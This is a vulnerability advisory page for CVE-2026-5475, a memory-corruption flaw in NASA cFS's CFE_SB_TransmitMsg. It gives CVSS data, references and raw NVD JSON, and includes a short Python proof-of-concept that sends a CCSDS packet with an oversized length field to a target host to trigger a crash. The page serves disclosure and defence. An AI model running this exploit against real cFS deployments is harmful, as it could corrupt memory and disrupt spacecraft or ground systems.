CVE-2026-5475

Description

A vulnerability was determined in NASA cFS up to 7.0.0. This impacts the function CFE_SB_TransmitMsg of the file cfe_sb_priv.c of the component CCSDS Header Size Handler. Executing a manipulation can lead to memory corruption. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nasa:core_flight_system:*:*:*:*:*:*:*:* - VULNERABLE

NASA cFS <= 7.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Target configuration
TARGET_IP = "127.0.0.1"
TARGET_PORT = 1234  # Example port for cFS SB interface

def craft_malicious_cfs_packet():
    """
    Crafts a malformed CCSDS header to trigger the memory corruption
    in CFE_SB_TransmitMsg within the CCSDS Header Size Handler.
    """
    # CCSDS Primary Header structure (simplified)
    # Version (3 bits), Type (1 bit), Data Field Header (1 bit), App ID (11 bits)
    # Sequence Flags (2 bits), Sequence Count (14 bits)
    # Data Length (16 bits)
    
    # Normal header construction
    version = 0
    type_flag = 0
    dfh_flag = 1
    app_id = 100
    
    seq_flags = 3
    seq_count = 0
    
    # Malformed logic: Set an unexpected size to trigger the vulnerability
    # Exploiting the lack of bounds checking in the Size Handler
    malicious_data_length = 0xFFFF 
    
    header = (version << 29) | (type_flag << 28) | (dfh_flag << 27) | (app_id << 16)
    header |= (seq_flags << 14) | seq_count
    
    # Pack the header and the malicious length
    packet = struct.pack("!I", header)
    packet += struct.pack("!H", malicious_data_length)
    
    # Add payload to fill the buffer
    payload = b"A" * 10
    packet += payload
    
    return packet

def send_exploit():
    try:
        # Create a socket connection to the target
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_IP, TARGET_PORT))
        
        print(f"[+] Sending malicious packet to {TARGET_IP}:{TARGET_PORT}")
        malicious_packet = craft_malicious_cfs_packet()
        s.send(malicious_packet)
        
        print("[+] Packet sent successfully. Check for crashes.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5475
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5475
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5475/
[4] VulDB https://vuldb.com/cve/CVE-2026-5475
[5] https://github.com/nasa/cFS/
[6] https://github.com/nasa/cFS/issues/953
[7] https://vuldb.com/submit/781951
[8] https://vuldb.com/vuln/355079
[9] https://vuldb.com/vuln/355079/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5475", "sourceIdentifier": "[email protected]", "published": "2026-04-03T18:16:26.250", "lastModified": "2026-05-04T14:25:27.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in NASA cFS up to 7.0.0. This impacts the function CFE_SB_TransmitMsg of the file cfe_sb_priv.c of the component CCSDS Header Size Handler. Executing a manipulation can lead to memory corruption. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 5.2, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 5.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:core_flight_system:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.0.0", "matchCriteriaId": "F1F33BA5-5EB7-4CC8-9DA9-DD9D880EA824"}]}]}], "references": [{"url": "https://github.com/nasa/cFS/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/nasa/cFS/issues/953", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/submit/781951", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/355079", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/355079/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}